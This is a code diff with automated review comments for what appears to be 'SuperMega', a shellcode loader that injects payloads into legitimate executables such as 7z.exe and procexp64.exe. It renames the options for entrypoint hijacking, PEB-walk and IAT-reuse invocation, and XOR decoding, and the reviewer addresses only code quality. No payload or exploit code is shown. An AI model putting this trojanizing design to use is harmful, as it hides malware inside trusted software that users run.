-
- {% for name, value in allocstyles %}
-
- {% endfor %}
-
-
{% for name, value in decoderstyles %}
{% endfor %}
-
-
- {% for name, value in execstyles %}
-
- {% endfor %}
-
diff --git a/app/templates/project_add_get.html b/app/templates/project_add_get.html
index b9972ec..51eca1f 100644
--- a/app/templates/project_add_get.html
+++ b/app/templates/project_add_get.html
@@ -35,13 +35,7 @@
- {% for name, value in sourcestyles %}
-
- {% endfor %}
-
-
-
- {% for name, value in allocstyles %}
+ {% for name, value in function_invoke_styles %}
{% endfor %}
@@ -52,14 +46,8 @@
{% endfor %}
-
- {% for name, value in execstyles %}
-
- {% endfor %}
-
-
-
- {% for name, value in injectstyles %}
+
+ {% for name, value in carrier_invoke_styles %}
{% endfor %}
diff --git a/app/views_project.py b/app/views_project.py
index 0474d5c..1ab1398 100644
--- a/app/views_project.py
+++ b/app/views_project.py
@@ -65,11 +65,9 @@ def project(name):
for file in os.listdir(PATH_SHELLCODES):
shellcodes.append(file)
- sourcestyles = [(color.name, color.value) for color in SourceStyle]
- allocstyles = [(color.name, color.value) for color in AllocStyle]
+ function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle]
decoderstyles = [(color.name, color.value) for color in DecoderStyle]
- execstyles = [(color.name, color.value) for color in ExecStyle]
- injectstyles = [(color.name, color.value) for color in InjectStyle]
+ carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
return render_template('project.html',
project_name = name,
@@ -79,11 +77,9 @@ def project(name):
exes=exes,
shellcodes=shellcodes,
- sourcestyles=sourcestyles,
- allocstyles=allocstyles,
+ function_invoke_styles=function_invoke_styles,
decoderstyles=decoderstyles,
- execstyles=execstyles,
- injectstyles=injectstyles,
+ carrier_invoke_styles=carrier_invoke_styles,
log_files=log_files,
is_64=is_64,
@@ -110,13 +106,10 @@ def add_project():
settings.inject_exe_out = request.form['exe'].replace(".exe", ".infected.exe")
source_style = request.form['source_style']
- settings.source_style = SourceStyle[source_style]
+ settings.source_style = FunctionInvokeStyle[source_style]
- inject_mode = request.form['inject_mode']
- settings.inject_mode = InjectStyle[inject_mode]
-
- alloc_style = request.form['alloc_style']
- settings.alloc_style = AllocStyle[alloc_style]
+ carrier_invoke_style = request.form['carrier_invoke_style']
+ settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style]
decoder_style = request.form['decoder_style']
settings.decoder_style = DecoderStyle[decoder_style]
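Review bot: `CarrierInvokeStyle[carrier_invoke_style]` on the new line raises `KeyError` for any member name not in the enum, and `request.form['carrier_invoke_style']` raises the same for a missing field, so a malformed or stale form post surfaces as an unhandled server error instead of a validation failure. The same applies to the renamed `FunctionInvokeStyle[source_style]` lookup above it; a guarded form such as `style_name = request.form.get('carrier_invoke_style', '')` followed by `if style_name not in CarrierInvokeStyle.__members__: abort(400)` (Flask's `abort`, assuming this is Flask given `render_template`/`request.form`) keeps bad input out of `settings`. Note also that the form key `'source_style'` is unchanged while the template loop variable became `function_invoke_styles`; whether the corresponding `<select name>` in the template was kept in sync is not visible in this diff. `add_project()` continues outside the hunk.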
@@ -147,20 +140,16 @@ def add_project():
for file in os.listdir(PATH_SHELLCODES):
shellcodes.append(file)
- sourcestyles = [(color.name, color.value) for color in SourceStyle]
- allocstyles = [(color.name, color.value) for color in AllocStyle]
+ function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle]
decoderstyles = [(color.name, color.value) for color in DecoderStyle]
- execstyles = [(color.name, color.value) for color in ExecStyle]
- injectstyles = [(color.name, color.value) for color in InjectStyle]
+ carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
return render_template('project_add_get.html',
exes=exes,
shellcodes=shellcodes,
- sourcestyles=sourcestyles,
- allocstyles=allocstyles,
+ function_invoke_styles=function_invoke_styles,
decoderstyles=decoderstyles,
- execstyles=execstyles,
- injectstyles=injectstyles,
+ carrier_invoke_styles=carrier_invoke_styles,
)
diff --git a/helper.py b/helper.py
index 9ee8972..847dade 100644
--- a/helper.py
+++ b/helper.py
@@ -107,14 +107,14 @@ def file_readall_binary(filepath) -> bytes:
return data
-def rbrunmode_str(rbrunmode):
- rbrunmode = str(rbrunmode)
- if rbrunmode == "1":
+def carrier_invoke_style_str(carrier_invoke_style):
+ carrier_invoke_style = str(carrier_invoke_style)
+ if carrier_invoke_style == "1":
return "change address of entrypoint"
- elif rbrunmode == "2":
+ elif carrier_invoke_style == "2":
return "hijack branching instruction in entrypoint"
else:
- return "Invalid: {}".format(rbrunmode)
+ return "Invalid: {}".format(carrier_invoke_style)
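Review bot: The renamed function still only understands the codes `"1"` and `"2"`, but the only caller in this diff — the error loop in `main()` of supermega.py (hunk `@@ -53,31 +51,25 @@`) — passes the CLI tokens `"eop"` and `"backdoor"`, so the usage message will print `eop Invalid: eop` and `backdoor Invalid: backdoor`. Either accept both spellings, `if carrier_invoke_style in ("1", "eop"):` and `elif carrier_invoke_style in ("2", "backdoor"):`, or have the caller pass the numeric codes. The function has no docstring; something like `"""Return a human-readable label for a carrier invoke style code, or 'Invalid: <code>' for anything unrecognised."""` would state the contract. The label returned for `"1"` ("change address of entrypoint") also differs from `CarrierInvokeStyle.ChangeEntryPoint.value` ("change AddressOfEntryPoint") in model/defs.py, which is worth unifying if either string is ever compared.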
diff --git a/model/defs.py b/model/defs.py
index 3786279..88ce722 100644
--- a/model/defs.py
+++ b/model/defs.py
@@ -23,33 +23,25 @@ PATH_WEB_PROJECT = "projects/"
# Correlated with real template files
# in data/plugins/
-class AllocStyle(Enum):
- RWX = "rwx_1"
- #RW_X = "rw_x"
- #REUSE = "reuse"
class DecoderStyle(Enum):
PLAIN_1 = "plain_1"
XOR_1 = "xor_1"
-class ExecStyle(Enum):
- CALL = "direct_1"
- #JMP = "jump",
- #FIBER = "fiber",
class DataRefStyle(Enum):
APPEND = 1
-class InjectStyle(Enum):
+class CarrierInvokeStyle(Enum):
ChangeEntryPoint = "change AddressOfEntryPoint"
BackdoorCallInstr = "hijack branching instruction in entrypoint"
-
-class SourceStyle(Enum):
+
+
+class FunctionInvokeStyle(Enum):
peb_walk = "peb_walk"
iat_reuse = "iat_reuse"
-
class PeRelocEntry():
def __init__(self, rva: int, base_rva: int, type: str):
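Review bot: The two renamed enums use different member-naming conventions in the same file — `CarrierInvokeStyle.ChangeEntryPoint` (CamelCase) next to `FunctionInvokeStyle.peb_walk` (snake_case) and `DecoderStyle.XOR_1` (upper snake). Because views_project.py resolves form values by member name (`CarrierInvokeStyle[...]`) and the templates render `color.value`, both the member names and the values are effectively part of the web-form protocol, so a class docstring should say so, e.g. `"""How the injected carrier gets control; member names are used as form keys, values as display strings."""` on `CarrierInvokeStyle` and the equivalent on `FunctionInvokeStyle`. Picking one naming style now is cheaper than after more callers depend on the names.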
diff --git a/model/settings.py b/model/settings.py
index 8b365a6..c8e2f50 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -9,15 +9,13 @@ class Settings():
self.payload_path: FilePath = ""
# Settings
- self.source_style: SourceStyle = SourceStyle.peb_walk
- self.alloc_style: AllocStyle = AllocStyle.RWX
- self.exec_style: ExecStyle = ExecStyle.CALL
+ self.source_style: FunctionInvokeStyle = FunctionInvokeStyle.peb_walk
self.decoder_style: DecoderStyle = DecoderStyle.XOR_1
self.dataref_style: DataRefStyle = DataRefStyle.APPEND
self.short_call_patching: bool = False
# Injectable
- self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr
+ self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
self.inject_exe_in: FilePath = ""
self.inject_exe_out: FilePath = ""
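Review bot: The rename is only half applied on the new line `self.source_style: FunctionInvokeStyle = FunctionInvokeStyle.peb_walk` — the type and the CLI flag are now "function invoke style", while the attribute, the form key in views_project.py and the `source_style` parameter in phases/compiler.py keep the old name. If renaming the attribute is out of scope, a comment such as `# Attribute kept as source_style for the web form / compiler API; the enum was renamed to FunctionInvokeStyle` would save the next reader from hunting for a second attribute. `Settings.__init__` starts before this hunk.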
diff --git a/pe/derbackdoorer.py b/pe/derbackdoorer.py
index 3d6de2f..9997a60 100644
--- a/pe/derbackdoorer.py
+++ b/pe/derbackdoorer.py
@@ -19,9 +19,9 @@ logger = logging.getLogger("DerBackdoorer")
class PeBackdoor:
- def __init__(self, superpe: SuperPe, main_shc: bytes, inject_mode: InjectStyle):
+ def __init__(self, superpe: SuperPe, main_shc: bytes, carrier_invoke_style: CarrierInvokeStyle):
self.superpe: SuperPe = superpe
- self.runMode: InjectStyle = inject_mode
+ self.carrier_invoke_style: CarrierInvokeStyle = carrier_invoke_style
self.shellcodeData: bytes = main_shc
# Working
@@ -72,17 +72,17 @@ Trailing {sect_name} bytes:
def setupShellcodeEntryPoint(self):
- if self.runMode == InjectStyle.ChangeEntryPoint:
+ if self.carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset)
self.superpe.set_entrypoint(rva)
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:X}')
return True
- elif self.runMode == InjectStyle.BackdoorCallInstr:
+ elif self.carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
return self.backdoorEntryPoint()
- #elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
+ #elif self.carrier_invoke_style == int(PeBackdoor.Supportedcarrier_invoke_styles.HijackExport):
# addr = self.getExportEntryPoint()
# if addr == -1:
# logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
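Review bot: The mechanical rename reached into commented-out code and produced `Supportedcarrier_invoke_styles` on the `#elif` line, which is neither the old nor the new identifier; that dead block should be deleted rather than renamed. Separately, `setupShellcodeEntryPoint` has no `else`, so a `carrier_invoke_style` that matches neither member falls through and the method implicitly returns `None` — the caller in phases/injector.py checks truthiness, so that works by accident; an explicit `else: logger.error("Unsupported carrier invoke style: %s", self.carrier_invoke_style); return False` makes the contract visible. The method body continues past the end of the hunk.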
diff --git a/phases/compiler.py b/phases/compiler.py
index 4465e04..4bcc18e 100644
--- a/phases/compiler.py
+++ b/phases/compiler.py
@@ -62,7 +62,7 @@ def compile(
asm_out: FilePath,
payload_len: int,
carrier: Carrier,
- source_style: SourceStyle,
+ source_style: FunctionInvokeStyle,
exe_host: ExeHost,
short_call_patching: bool = False,
):
@@ -111,7 +111,7 @@ def compile(
asm_clean_file
))
- if source_style == SourceStyle.iat_reuse:
+ if source_style == FunctionInvokeStyle.iat_reuse:
fixup_iat_reuse(asm_clean_file, carrier)
observer.add_text_file("carrier_asm_updated", file_readall_text(asm_clean_file))
diff --git a/phases/injector.py b/phases/injector.py
index 09cd0da..c59e22e 100644
--- a/phases/injector.py
+++ b/phases/injector.py
@@ -23,8 +23,8 @@ def inject_exe(
shellcode_in = project.payload.payload_path
exe_in = settings.inject_exe_in
exe_out = settings.inject_exe_out
- inject_mode: InjectStyle = settings.inject_mode
- source_style: SourceStyle = settings.source_style
+ carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style
+ source_style: FunctionInvokeStyle = settings.source_style
logger.info("--[ Injecting: {} + {} -> {}".format(
shellcode_in, exe_in, exe_out
@@ -42,7 +42,7 @@ def inject_exe(
# superpe is a representation of the exe file. We gonna modify it, and save it at the end.
superpe = SuperPe(exe_in)
- peinj = PeBackdoor(superpe, main_shc, inject_mode)
+ peinj = PeBackdoor(superpe, main_shc, carrier_invoke_style)
if not peinj.injectShellcode():
logger.error('Could not inject shellcode into PE file!')
@@ -53,7 +53,7 @@ def inject_exe(
return False
logger.info("--[ Rewrite placeholders with their data")
- if source_style == SourceStyle.iat_reuse:
+ if source_style == FunctionInvokeStyle.iat_reuse:
injected_fix_iat(superpe, project.carrier, project.exe_host)
if True:
diff --git a/phases/templater.py b/phases/templater.py
index 8a3b30d..4df0271 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -24,7 +24,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
})
# C Template: peb_walk
- if settings.source_style == SourceStyle.peb_walk:
+ if settings.source_style == FunctionInvokeStyle.peb_walk:
with open(settings.template_path, 'r', encoding='utf-8') as file:
template_content = file.read()
observer.add_text_file("main_c_template", template_content)
@@ -39,7 +39,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
observer.add_text_file("main_c_rendered", rendered_template)
# C Template: iat_reuse
- elif settings.source_style == SourceStyle.iat_reuse:
+ elif settings.source_style == FunctionInvokeStyle.iat_reuse:
with open(PATH_IAT_REUSE + "template.c", 'r', encoding='utf-8') as file:
template_content = file.read()
observer.add_text_file("main_c_template", template_content)
diff --git a/supermega.py b/supermega.py
index b766ef5..23e2240 100644
--- a/supermega.py
+++ b/supermega.py
@@ -29,11 +29,9 @@ def main():
parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in')
- parser.add_argument('--sourcestyle', type=str, help='peb_walk or iat_reuse')
- #parser.add_argument('--alloc', type=str, help='Template: which allocator plugin')
+ parser.add_argument('--function_invoke_style', type=str, help='peb_walk or iat_reuse')
parser.add_argument('--decoder', type=str, help='Template: which decoder plugin')
- #parser.add_argument('--exec', type=str, help='Template: which exec plugin')
- parser.add_argument('--rbrunmode', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)')
+ parser.add_argument('--carrier_invoke', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)')
parser.add_argument('--start-injected', action='store_true', help='Dev: Start the generated infected executable at the end')
parser.add_argument('--start-loader-shellcode', action='store_true', help='Dev: Start the loader shellcode (without payload)')
parser.add_argument('--start-final-shellcode', action='store_true', help='Debug: Start the final shellcode (loader + payload)')
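Review bot: The help text kept on the new `--carrier_invoke` line still says "(1 EAP, 2 hijack)", but the parsing code in the next hunk accepts only `"eop"` and `"backdoor"`, so a user following the help will hit the error path. Passing `choices=['eop', 'backdoor']` and `choices=['peb_walk', 'iat_reuse']` to the two renamed arguments lets argparse reject bad values with a proper usage error and removes the silent fall-through in the next hunk, where an unknown `--function_invoke_style` is ignored without any message. On style, the new flags use underscores (`--function_invoke_style`, `--carrier_invoke`) while the neighbouring flags are hyphenated (`--start-injected`); argparse maps `--function-invoke-style` to `args.function_invoke_style`, so the hyphenated form costs nothing. `main()` continues outside the hunk.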
@@ -53,31 +51,25 @@ def main():
if args.short_call_patching:
settings.short_call_patching = True
- if args.sourcestyle:
- if args.sourcestyle == "peb_walk":
- settings.source_style = SourceStyle.peb_walk
- elif args.sourcestyle == "iat_reuse":
- settings.source_style = SourceStyle.iat_reuse
- #if args.alloc:
- # if args.alloc == "rwx_1":
- # settings.alloc_style = AllocStyle.RWX
+ if args.function_invoke_style:
+ if args.function_invoke_style == "peb_walk":
+ settings.source_style = FunctionInvokeStyle.peb_walk
+ elif args.function_invoke_style == "iat_reuse":
+ settings.source_style = FunctionInvokeStyle.iat_reuse
if args.decoder:
if args.decoder == "plain_1":
settings.decoder_style = DecoderStyle.PLAIN_1
elif args.decoder == "xor_1":
settings.decoder_style = DecoderStyle.XOR_1
- #if args.exec:
- # if args.exec == "direct_1":
- # settings.exec_style = ExecStyle.CALL
if args.inject:
- if args.rbrunmode == "eop":
- settings.inject_mode = InjectStyle.ChangeEntryPoint
- elif args.rbrunmode == "backdoor":
- settings.inject_mode = InjectStyle.BackdoorCallInstr
+ if args.carrier_invoke == "eop":
+ settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
+ elif args.carrier_invoke == "backdoor":
+ settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr
else:
logging.error("Invalid mode, use one of:")
for i in ["eop", "backdoor"]:
- logging.error(" {} {}".format(i, rbrunmode_str(i)))
+ logging.error(" {} {}".format(i, carrier_invoke_style_str(i)))
return
if not args.shellcode or not args.inject:
@@ -141,13 +133,10 @@ def start_real(settings: Settings):
project = Project(settings)
project.init()
- logger.warning("--I SourceStyle: {} Inject Mode: {} ".format(
- project.settings.source_style.value, project.settings.inject_mode.value))
- logger.warning("--I Loader modules: Alloc: {} Decoder: {} Exec: {}".format(
- project.settings.alloc_style.value,
- project.settings.decoder_style.value,
- project.settings.exec_style.value
- ))
+ logger.warning("--I FunctionInvokeStyle: {} Inject Mode: {} DecoderStyle: {}".format(
+ project.settings.source_style.value,
+ project.settings.carrier_invoke_style.value,
+ project.settings.decoder_style.value))
# Create: Carrier C source files from template (C->C)
phases.templater.create_c_from_template(settings, project.payload.len)
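Review bot: The rebuilt log line labels the second value "Inject Mode:" although it now prints `project.settings.carrier_invoke_style.value` and the neighbouring labels were updated to the new enum names; `"--I FunctionInvokeStyle: {} CarrierInvokeStyle: {} DecoderStyle: {}"` keeps the output consistent with the code. `start_real()` continues outside the hunk.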
diff --git a/tester.py b/tester.py
index 4a9cf0a..94d01a0 100644
--- a/tester.py
+++ b/tester.py
@@ -19,8 +19,8 @@ def main():
settings.try_start_final_infected_exe = False
# 7z, peb-walk, change-entrypoint
- settings.source_style = SourceStyle.peb_walk
- settings.inject_mode = InjectStyle.ChangeEntryPoint
+ settings.source_style = FunctionInvokeStyle.peb_walk
+ settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
settings.inject_exe_in = PATH_EXES + "7z.exe"
settings.inject_exe_out = PATH_EXES + "7z.verify.exe"
if start(settings) != 0:
@@ -28,8 +28,8 @@ def main():
return 1
# 7z, peb-walk, hijack
- settings.source_style = SourceStyle.peb_walk
- settings.inject_mode = InjectStyle.BackdoorCallInstr
+ settings.source_style = FunctionInvokeStyle.peb_walk
+ settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr
settings.inject_exe_in = PATH_EXES + "7z.exe"
settings.inject_exe_out = PATH_EXES + "7z.verify.exe"
if start(settings) != 0:
@@ -37,8 +37,8 @@ def main():
return 1
# procexp, iat-reuse, change-entrypoint
- settings.source_style = SourceStyle.iat_reuse
- settings.inject_mode = InjectStyle.ChangeEntryPoint
+ settings.source_style = FunctionInvokeStyle.iat_reuse
+ settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
settings.inject_exe_in = PATH_EXES + "procexp64.exe"
settings.inject_exe_out = PATH_EXES + "procexp64.verify.exe"
if start(settings) != 0:
@@ -46,8 +46,8 @@ def main():
return 1
# procexp, iat-reuse, change-entrypoint
- settings.source_style = SourceStyle.iat_reuse
- settings.inject_mode = InjectStyle.ChangeEntryPoint
+ settings.source_style = FunctionInvokeStyle.iat_reuse
+ settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
settings.inject_exe_in = PATH_EXES + "procexp64.exe"
settings.inject_exe_out = PATH_EXES + "procexp64.verify.exe"
if start(settings) != 0:
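Review bot: After the rename this fourth case is byte-identical to the third one — same comment "procexp, iat-reuse, change-entrypoint", same `FunctionInvokeStyle.iat_reuse` and `CarrierInvokeStyle.ChangeEntryPoint`, same input and output paths — so it runs the same scenario twice. Given that the 7z pair covers both carrier styles, this looks like it was meant to be `settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr` with the comment updated to "hijack"; worth confirming with the author since the duplication predates this commit. `main()` continues outside the hunk.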